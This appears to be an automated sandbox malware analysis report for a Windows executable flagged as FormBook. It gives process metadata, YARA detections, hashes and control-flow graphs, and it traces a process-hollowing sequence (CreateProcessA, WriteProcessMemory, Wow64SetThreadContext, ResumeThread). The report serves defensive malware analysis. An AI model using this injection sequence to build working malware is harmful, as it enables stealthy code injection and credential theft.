                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe"
                                                                                                                                                                                                                                Imagebase:0x850000
                                                                                                                                                                                                                                File size:766'976 bytes
                                                                                                                                                                                                                                MD5 hash:8A6F66334502BC3DA28732CCD4353D14
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.179274577947.0000000005D30000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.179229670326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:3
                                                                                                                                                                                                                                Start time:08:51:09
                                                                                                                                                                                                                                Start date:03/12/2024
                                                                                                                                                                                                                                Path:C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
                                                                                                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                                                                                                File size:16'696'840 bytes
                                                                                                                                                                                                                                MD5 hash:731FB4B2E5AFBCADAABB80D642E056AC
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:4
                                                                                                                                                                                                                                Start time:08:51:09
                                                                                                                                                                                                                                Start date:03/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Windows\SysWOW64\cacls.exe"
                                                                                                                                                                                                                                Imagebase:0x1f0000
                                                                                                                                                                                                                                File size:27'648 bytes
                                                                                                                                                                                                                                MD5 hash:00BAAE10C69DAD58F169A3ED638D6C59
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.182790212280.0000000003470000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.182790291540.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:5
                                                                                                                                                                                                                                Start time:08:51:34
                                                                                                                                                                                                                                Start date:03/12/2024
                                                                                                                                                                                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff6881c0000
                                                                                                                                                                                                                                File size:597'432 bytes
                                                                                                                                                                                                                                MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Disassembly

                                                                                                                                                                                                                                Reset < >

                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                  Execution Coverage:9.7%
                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                                  Total number of Nodes:250
                                                                                                                                                                                                                                  Total number of Limit Nodes:16
                                                                                                                                                                                                                                  execution_graph 21550 193b090 21554 193b177 21550->21554 21559 193b188 21550->21559 21551 193b09f 21555 193b199 21554->21555 21556 193b1bc 21554->21556 21555->21556 21557 193b3c0 GetModuleHandleW 21555->21557 21556->21551 21558 193b3ed 21557->21558 21558->21551 21560 193b1bc 21559->21560 21561 193b199 21559->21561 21560->21551 21561->21560 21562 193b3c0 GetModuleHandleW 21561->21562 21563 193b3ed 21562->21563 21563->21551 21789 193d660 DuplicateHandle 21790 193d6f6 21789->21790 21791 7958e61 21792 7958e6a 21791->21792 21795 7958e85 21791->21795 21793 7959023 21794 7956014 PostMessageW 21794->21795 21795->21793 21795->21794 21564 193d418 21565 193d45e GetCurrentProcess 21564->21565 21567 193d4b0 GetCurrentThread 21565->21567 21568 193d4a9 21565->21568 21569 193d4ed GetCurrentProcess 21567->21569 21570 193d4e6 21567->21570 21568->21567 21573 193d523 21569->21573 21570->21569 21571 193d54b GetCurrentThreadId 21572 193d57c 21571->21572 21573->21571 21796 1934668 21797 1934672 21796->21797 21801 1934758 21796->21801 21806 1933e34 21797->21806 21799 193468d 21802 193477d 21801->21802 21810 1934858 21802->21810 21814 1934868 21802->21814 21807 1933e3f 21806->21807 21822 1935d24 21807->21822 21809 1936f8f 21809->21799 21812 193488f 21810->21812 21811 193496c 21811->21811 21812->21811 21818 19344b4 21812->21818 21816 193488f 21814->21816 21815 193496c 21815->21815 21816->21815 21817 19344b4 CreateActCtxA 21816->21817 21817->21815 21819 19358f8 CreateActCtxA 21818->21819 21821 19359bb 21819->21821 21823 1935d2f 21822->21823 21826 1935da4 21823->21826 21825 19371bd 21825->21809 21827 1935daf 21826->21827 21830 1935dd4 21827->21830 21829 193729a 21829->21825 21831 1935ddf 21830->21831 21834 1935df4 21831->21834 21833 193738d 21833->21829 21835 1935dff 21834->21835 21840 1938374 21835->21840 21837 1938700 21838 1938929 21837->21838 21844 193d141 21837->21844 21838->21833 21842 193837f 21840->21842 21841 1939ba1 21841->21837 21842->21841 21849 19385bc 21842->21849 21845 193d171 21844->21845 21846 193d195 21845->21846 21853 193d300 21845->21853 21857 193d2f0 21845->21857 21846->21838 21850 1939d00 FindWindowW 21849->21850 21852 1939d85 21850->21852 21852->21841 21854 193d30d 21853->21854 21855 193d347 21854->21855 21861 193cc40 21854->21861 21855->21846 21858 193d30d 21857->21858 21859 193d347 21858->21859 21860 193cc40 FindWindowW 21858->21860 21859->21846 21860->21859 21862 193cc4b 21861->21862 21864 193dc58 21862->21864 21865 193cd6c 21862->21865 21864->21864 21866 193cd77 21865->21866 21867 1935df4 FindWindowW 21866->21867 21868 193dcc7 21867->21868 21868->21864 21574 79573b9 21575 79572b6 21574->21575 21576 79572c6 21575->21576 21579 7957c90 21575->21579 21599 7957c80 21575->21599 21580 7957caa 21579->21580 21619 7958217 21580->21619 21632 795832a 21580->21632 21638 795858a 21580->21638 21643 7958129 21580->21643 21648 795874e 21580->21648 21652 795864c 21580->21652 21661 795838c 21580->21661 21666 795818d 21580->21666 21672 79580a0 21580->21672 21678 7958120 21580->21678 21684 7958441 21580->21684 21688 7958701 21580->21688 21693 79583e6 21580->21693 21702 7958784 21580->21702 21708 7958404 21580->21708 21717 795871f 21580->21717 21722 79585d7 21580->21722 21581 7957cce 21581->21576 21600 7957caa 21599->21600 21602 7958217 7 API calls 21600->21602 21603 79585d7 2 API calls 21600->21603 21604 795871f 2 API calls 21600->21604 21605 7958404 5 API calls 21600->21605 21606 7958784 3 API calls 21600->21606 21607 79583e6 5 API calls 21600->21607 21608 7958701 2 API calls 21600->21608 21609 7958441 2 API calls 21600->21609 21610 7958120 3 API calls 21600->21610 21611 79580a0 3 API calls 21600->21611 21612 795818d 3 API calls 21600->21612 21613 795838c 2 API calls 21600->21613 21614 795864c 5 API calls 21600->21614 21615 795874e 2 API calls 21600->21615 21616 7958129 3 API calls 21600->21616 21617 795858a 3 API calls 21600->21617 21618 795832a 3 API calls 21600->21618 21601 7957cce 21601->21576 21602->21601 21603->21601 21604->21601 21605->21601 21606->21601 21607->21601 21608->21601 21609->21601 21610->21601 21611->21601 21612->21601 21613->21601 21614->21601 21615->21601 21616->21601 21617->21601 21618->21601 21620 795823c 21619->21620 21621 795866a 21619->21621 21620->21621 21746 7956a61 21620->21746 21750 7956a68 21620->21750 21622 7958a84 21621->21622 21738 7956578 21621->21738 21742 7956580 21621->21742 21623 7958196 21624 79584a8 21623->21624 21726 7956cf0 21623->21726 21730 7956ce8 21623->21730 21734 7956dc9 21623->21734 21624->21581 21633 7958196 21632->21633 21634 79584a8 21633->21634 21635 7956cf0 ReadProcessMemory 21633->21635 21636 7956dc9 ReadProcessMemory 21633->21636 21637 7956ce8 ReadProcessMemory 21633->21637 21634->21581 21635->21634 21636->21634 21637->21634 21640 7956cf0 ReadProcessMemory 21638->21640 21641 7956dc9 ReadProcessMemory 21638->21641 21642 7956ce8 ReadProcessMemory 21638->21642 21639 79584a8 21639->21581 21640->21639 21641->21639 21642->21639 21644 7958171 21643->21644 21754 7956e86 21643->21754 21758 7956e88 21643->21758 21762 7956e7c 21643->21762 21644->21581 21766 7956b40 21648->21766 21770 7956b38 21648->21770 21649 795876f 21653 7958652 21652->21653 21656 7956580 ResumeThread 21653->21656 21657 7956578 ResumeThread 21653->21657 21654 7958196 21655 79584a8 21654->21655 21658 7956cf0 ReadProcessMemory 21654->21658 21659 7956dc9 ReadProcessMemory 21654->21659 21660 7956ce8 ReadProcessMemory 21654->21660 21655->21581 21656->21654 21657->21654 21658->21655 21659->21655 21660->21655 21662 7958392 21661->21662 21663 795870e 21662->21663 21774 7956c00 21662->21774 21778 7956bf8 21662->21778 21667 7958196 21666->21667 21668 79584a8 21667->21668 21669 7956cf0 ReadProcessMemory 21667->21669 21670 7956dc9 ReadProcessMemory 21667->21670 21671 7956ce8 ReadProcessMemory 21667->21671 21668->21581 21669->21668 21670->21668 21671->21668 21673 79580c1 21672->21673 21675 7956e86 CreateProcessA 21673->21675 21676 7956e7c CreateProcessA 21673->21676 21677 7956e88 CreateProcessA 21673->21677 21674 7958171 21674->21581 21675->21674 21676->21674 21677->21674 21679 7958123 21678->21679 21680 79580b3 21678->21680 21679->21581 21681 7956e86 CreateProcessA 21680->21681 21682 7956e7c CreateProcessA 21680->21682 21683 7956e88 CreateProcessA 21680->21683 21681->21679 21682->21679 21683->21679 21686 7956c00 WriteProcessMemory 21684->21686 21687 7956bf8 WriteProcessMemory 21684->21687 21685 79581f9 21685->21581 21686->21685 21687->21685 21689 79583a3 21688->21689 21690 795870e 21688->21690 21689->21688 21691 7956c00 WriteProcessMemory 21689->21691 21692 7956bf8 WriteProcessMemory 21689->21692 21691->21689 21692->21689 21694 79583ec 21693->21694 21700 7956580 ResumeThread 21694->21700 21701 7956578 ResumeThread 21694->21701 21695 7958196 21696 79584a8 21695->21696 21697 7956cf0 ReadProcessMemory 21695->21697 21698 7956dc9 ReadProcessMemory 21695->21698 21699 7956ce8 ReadProcessMemory 21695->21699 21696->21581 21697->21696 21698->21696 21699->21696 21700->21695 21701->21695 21703 7958196 21702->21703 21703->21702 21704 79584a8 21703->21704 21705 7956cf0 ReadProcessMemory 21703->21705 21706 7956dc9 ReadProcessMemory 21703->21706 21707 7956ce8 ReadProcessMemory 21703->21707 21704->21581 21705->21704 21706->21704 21707->21704 21709 79583fd 21708->21709 21715 7956580 ResumeThread 21709->21715 21716 7956578 ResumeThread 21709->21716 21710 7958196 21711 79584a8 21710->21711 21712 7956cf0 ReadProcessMemory 21710->21712 21713 7956dc9 ReadProcessMemory 21710->21713 21714 7956ce8 ReadProcessMemory 21710->21714 21711->21581 21712->21711 21713->21711 21714->21711 21715->21710 21716->21710 21718 7958aff 21717->21718 21720 7956a61 Wow64SetThreadContext 21718->21720 21721 7956a68 Wow64SetThreadContext 21718->21721 21719 7958b1d 21720->21719 21721->21719 21724 7956c00 WriteProcessMemory 21722->21724 21725 7956bf8 WriteProcessMemory 21722->21725 21723 7958546 21724->21723 21725->21723 21727 7956d3b ReadProcessMemory 21726->21727 21729 7956d7f 21727->21729 21729->21624 21731 7956d3b ReadProcessMemory 21730->21731 21733 7956d7f 21731->21733 21733->21624 21735 7956d5c ReadProcessMemory 21734->21735 21737 7956dce 21734->21737 21736 7956d7f 21735->21736 21736->21624 21737->21624 21739 79565c0 ResumeThread 21738->21739 21741 79565f1 21739->21741 21741->21623 21743 79565c0 ResumeThread 21742->21743 21745 79565f1 21743->21745 21745->21623 21747 7956aad Wow64SetThreadContext 21746->21747 21749 7956af5 21747->21749 21749->21621 21751 7956aad Wow64SetThreadContext 21750->21751 21753 7956af5 21751->21753 21753->21621 21755 7956f11 CreateProcessA 21754->21755 21757 79570d3 21755->21757 21759 7956f11 CreateProcessA 21758->21759 21761 79570d3 21759->21761 21761->21761 21763 7956e82 CreateProcessA 21762->21763 21765 79570d3 21763->21765 21767 7956b80 VirtualAllocEx 21766->21767 21769 7956bbd 21767->21769 21769->21649 21771 7956b3d VirtualAllocEx 21770->21771 21773 7956bbd 21771->21773 21773->21649 21775 7956c48 WriteProcessMemory 21774->21775 21777 7956c9f 21775->21777 21777->21662 21779 7956c48 WriteProcessMemory 21778->21779 21781 7956c9f 21779->21781 21781->21662 21782 7958e98 21783 7959023 21782->21783 21784 7958ebe 21782->21784 21784->21783 21786 7956014 21784->21786 21787 7959118 PostMessageW 21786->21787 21788 7959184 21787->21788 21788->21784

                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                  Function 0193D409 Relevance: 6.1, APIs: 4, Instructions: 129threadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 294 193d409-193d4a7 GetCurrentProcess 298 193d4b0-193d4e4 GetCurrentThread 294->298 299 193d4a9-193d4af 294->299 300 193d4e6-193d4ec 298->300 301 193d4ed-193d521 GetCurrentProcess 298->301 299->298 300->301 303 193d523-193d529 301->303 304 193d52a-193d545 call 193d5e7 301->304 303->304 307 193d54b-193d57a GetCurrentThreadId 304->307 308 193d583-193d5e5 307->308 309 193d57c-193d582 307->309 309->308
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 0193D496
                                                                                                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 0193D4D3
                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 0193D510
                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0193D569
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178878013804.0000000001930000.00000040.00000800.00020000.00000000.sdmp, Offset: 01930000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_1930000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Current$ProcessThread
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2063062207-0
                                                                                                                                                                                                                                  • Opcode ID: d2669dd93709e3752b1c43ff25a49a26774557be3ecfa09521ab8ee6969d10ae
                                                                                                                                                                                                                                  • Instruction ID: cf5a7837ca630aabd9f1ffa791831dce3308aa012dba88cbf70d1354a8e5d199
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d2669dd93709e3752b1c43ff25a49a26774557be3ecfa09521ab8ee6969d10ae
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8F514AB09003498FDB14CFAAD5887AEBFF5BF89304F208459D809A7350D738A984CF65
                                                                                                                                                                                                                                  Function 0193D418 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 316 193d418-193d4a7 GetCurrentProcess 320 193d4b0-193d4e4 GetCurrentThread 316->320 321 193d4a9-193d4af 316->321 322 193d4e6-193d4ec 320->322 323 193d4ed-193d521 GetCurrentProcess 320->323 321->320 322->323 325 193d523-193d529 323->325 326 193d52a-193d545 call 193d5e7 323->326 325->326 329 193d54b-193d57a GetCurrentThreadId 326->329 330 193d583-193d5e5 329->330 331 193d57c-193d582 329->331 331->330
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 0193D496
                                                                                                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 0193D4D3
                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 0193D510
                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0193D569
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178878013804.0000000001930000.00000040.00000800.00020000.00000000.sdmp, Offset: 01930000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_1930000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Current$ProcessThread
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2063062207-0
                                                                                                                                                                                                                                  • Opcode ID: 7adcaab32e30b0b50d6942674570a287072f03724f0ddf6f8f2c2f887bd028e5
                                                                                                                                                                                                                                  • Instruction ID: c24c0f6bff7b7d5897eb72a05bc2c72fe17b9133e9d95f03e8e2da1d6b8b6fc0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7adcaab32e30b0b50d6942674570a287072f03724f0ddf6f8f2c2f887bd028e5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 665128B09002498FDB14DFAAD488BAEBFF5FF89314F208459E409A7350D738A984CF65
                                                                                                                                                                                                                                  Function 07956E7C Relevance: 1.8, APIs: 1, Instructions: 251COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 368 7956e7c-7956e80 369 7956e82-7956e84 368->369 370 7956e88-7956f1d 368->370 369->370 372 7956f56-7956f76 370->372 373 7956f1f-7956f29 370->373 378 7956faf-7956fde 372->378 379 7956f78-7956f82 372->379 373->372 374 7956f2b-7956f2d 373->374 376 7956f50-7956f53 374->376 377 7956f2f-7956f39 374->377 376->372 380 7956f3d-7956f4c 377->380 381 7956f3b 377->381 387 7957017-79570d1 CreateProcessA 378->387 388 7956fe0-7956fea 378->388 379->378 383 7956f84-7956f86 379->383 380->380 382 7956f4e 380->382 381->380 382->376 384 7956fa9-7956fac 383->384 385 7956f88-7956f92 383->385 384->378 389 7956f94 385->389 390 7956f96-7956fa5 385->390 401 79570d3-79570d9 387->401 402 79570da-7957160 387->402 388->387 391 7956fec-7956fee 388->391 389->390 390->390 392 7956fa7 390->392 393 7957011-7957014 391->393 394 7956ff0-7956ffa 391->394 392->384 393->387 396 7956ffc 394->396 397 7956ffe-795700d 394->397 396->397 397->397 398 795700f 397->398 398->393 401->402 412 7957170-7957174 402->412 413 7957162-7957166 402->413 415 7957184-7957188 412->415 416 7957176-795717a 412->416 413->412 414 7957168 413->414 414->412 418 7957198-795719c 415->418 419 795718a-795718e 415->419 416->415 417 795717c 416->417 417->415 421 79571ae-79571b5 418->421 422 795719e-79571a4 418->422 419->418 420 7957190 419->420 420->418 423 79571b7-79571c6 421->423 424 79571cc 421->424 422->421 423->424 426 79571cd 424->426 426->426
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178884084388.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7950000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 321ea72e1fad5e09025693689416f71ec849f13cbe68b4c58458a3c3a202f3c0
                                                                                                                                                                                                                                  • Instruction ID: 9fb45ffe2875cb4cd02356c2babff7a1152c3b69d6ff2f49e2055520d6e83543
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 321ea72e1fad5e09025693689416f71ec849f13cbe68b4c58458a3c3a202f3c0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 29A16EB1D0022A9FDB20CFA8CC417EEBBB6BF44314F1485A9EC58A7250DB749985CF91
                                                                                                                                                                                                                                  Function 07956E88 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 427 7956e88-7956f1d 429 7956f56-7956f76 427->429 430 7956f1f-7956f29 427->430 435 7956faf-7956fde 429->435 436 7956f78-7956f82 429->436 430->429 431 7956f2b-7956f2d 430->431 433 7956f50-7956f53 431->433 434 7956f2f-7956f39 431->434 433->429 437 7956f3d-7956f4c 434->437 438 7956f3b 434->438 444 7957017-79570d1 CreateProcessA 435->444 445 7956fe0-7956fea 435->445 436->435 440 7956f84-7956f86 436->440 437->437 439 7956f4e 437->439 438->437 439->433 441 7956fa9-7956fac 440->441 442 7956f88-7956f92 440->442 441->435 446 7956f94 442->446 447 7956f96-7956fa5 442->447 458 79570d3-79570d9 444->458 459 79570da-7957160 444->459 445->444 448 7956fec-7956fee 445->448 446->447 447->447 449 7956fa7 447->449 450 7957011-7957014 448->450 451 7956ff0-7956ffa 448->451 449->441 450->444 453 7956ffc 451->453 454 7956ffe-795700d 451->454 453->454 454->454 455 795700f 454->455 455->450 458->459 469 7957170-7957174 459->469 470 7957162-7957166 459->470 472 7957184-7957188 469->472 473 7957176-795717a 469->473 470->469 471 7957168 470->471 471->469 475 7957198-795719c 472->475 476 795718a-795718e 472->476 473->472 474 795717c 473->474 474->472 478 79571ae-79571b5 475->478 479 795719e-79571a4 475->479 476->475 477 7957190 476->477 477->475 480 79571b7-79571c6 478->480 481 79571cc 478->481 479->478 480->481 483 79571cd 481->483 483->483
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 079570BE
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178884084388.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7950000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateProcess
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                                                                                                                  • Opcode ID: dc1ae3a3d6959ee589d53a1ba3f95c930056f72f78d9dcd4a377ece37e79dc56
                                                                                                                                                                                                                                  • Instruction ID: 0834297160c66ab50de6c5daddd920e64cfbee2e1d1fc03dab6826011a25d165
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dc1ae3a3d6959ee589d53a1ba3f95c930056f72f78d9dcd4a377ece37e79dc56
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C8914DB1D0022A9FDB10CFA8CC417EDBBB6BF48314F1485A9EC59A7250DB749985CF91
                                                                                                                                                                                                                                  Function 07956E86 Relevance: 1.7, APIs: 1, Instructions: 242processCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 484 7956e86-7956f1d 486 7956f56-7956f76 484->486 487 7956f1f-7956f29 484->487 492 7956faf-7956fde 486->492 493 7956f78-7956f82 486->493 487->486 488 7956f2b-7956f2d 487->488 490 7956f50-7956f53 488->490 491 7956f2f-7956f39 488->491 490->486 494 7956f3d-7956f4c 491->494 495 7956f3b 491->495 501 7957017-79570d1 CreateProcessA 492->501 502 7956fe0-7956fea 492->502 493->492 497 7956f84-7956f86 493->497 494->494 496 7956f4e 494->496 495->494 496->490 498 7956fa9-7956fac 497->498 499 7956f88-7956f92 497->499 498->492 503 7956f94 499->503 504 7956f96-7956fa5 499->504 515 79570d3-79570d9 501->515 516 79570da-7957160 501->516 502->501 505 7956fec-7956fee 502->505 503->504 504->504 506 7956fa7 504->506 507 7957011-7957014 505->507 508 7956ff0-7956ffa 505->508 506->498 507->501 510 7956ffc 508->510 511 7956ffe-795700d 508->511 510->511 511->511 512 795700f 511->512 512->507 515->516 526 7957170-7957174 516->526 527 7957162-7957166 516->527 529 7957184-7957188 526->529 530 7957176-795717a 526->530 527->526 528 7957168 527->528 528->526 532 7957198-795719c 529->532 533 795718a-795718e 529->533 530->529 531 795717c 530->531 531->529 535 79571ae-79571b5 532->535 536 795719e-79571a4 532->536 533->532 534 7957190 533->534 534->532 537 79571b7-79571c6 535->537 538 79571cc 535->538 536->535 537->538 540 79571cd 538->540 540->540
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 079570BE
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178884084388.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7950000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateProcess
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                                                                                                                  • Opcode ID: 54fe936a76bd102b45f08a25a3a3b451b516a49172d79244df00c11a8722402b
                                                                                                                                                                                                                                  • Instruction ID: 70f2e54b0f40fabbaac9be917934c567cd644af8ae539875ee3fffe7f2c0f941
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 54fe936a76bd102b45f08a25a3a3b451b516a49172d79244df00c11a8722402b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5D914DB1D0022A9FDB10CFA8CC417EDBBB6BF48314F1485A9EC59A7250DB749985CF91
                                                                                                                                                                                                                                  Function 0193B188 Relevance: 1.7, APIs: 1, Instructions: 195COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 541 193b188-193b197 542 193b1c3-193b1c7 541->542 543 193b199-193b1a6 call 1939ad4 541->543 545 193b1db-193b21c 542->545 546 193b1c9-193b1d3 542->546 550 193b1a8 543->550 551 193b1bc 543->551 552 193b229-193b237 545->552 553 193b21e-193b226 545->553 546->545 596 193b1ae call 193b413 550->596 597 193b1ae call 193b420 550->597 551->542 554 193b25b-193b25d 552->554 555 193b239-193b23e 552->555 553->552 560 193b260-193b267 554->560 557 193b240-193b247 call 193ab7c 555->557 558 193b249 555->558 556 193b1b4-193b1b6 556->551 559 193b2f8-193b3b8 556->559 564 193b24b-193b259 557->564 558->564 591 193b3c0-193b3eb GetModuleHandleW 559->591 592 193b3ba-193b3bd 559->592 561 193b274-193b27b 560->561 562 193b269-193b271 560->562 565 193b288-193b291 call 193ab8c 561->565 566 193b27d-193b285 561->566 562->561 564->560 572 193b293-193b29b 565->572 573 193b29e-193b2a3 565->573 566->565 572->573 574 193b2c1-193b2ce 573->574 575 193b2a5-193b2ac 573->575 581 193b2f1-193b2f7 574->581 582 193b2d0-193b2ee 574->582 575->574 577 193b2ae-193b2be call 193ab9c call 193abac 575->577 577->574 582->581 593 193b3f4-193b408 591->593 594 193b3ed-193b3f3 591->594 592->591 594->593 596->556 597->556
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0193B3DE
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178878013804.0000000001930000.00000040.00000800.00020000.00000000.sdmp, Offset: 01930000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_1930000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: HandleModule
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4139908857-0
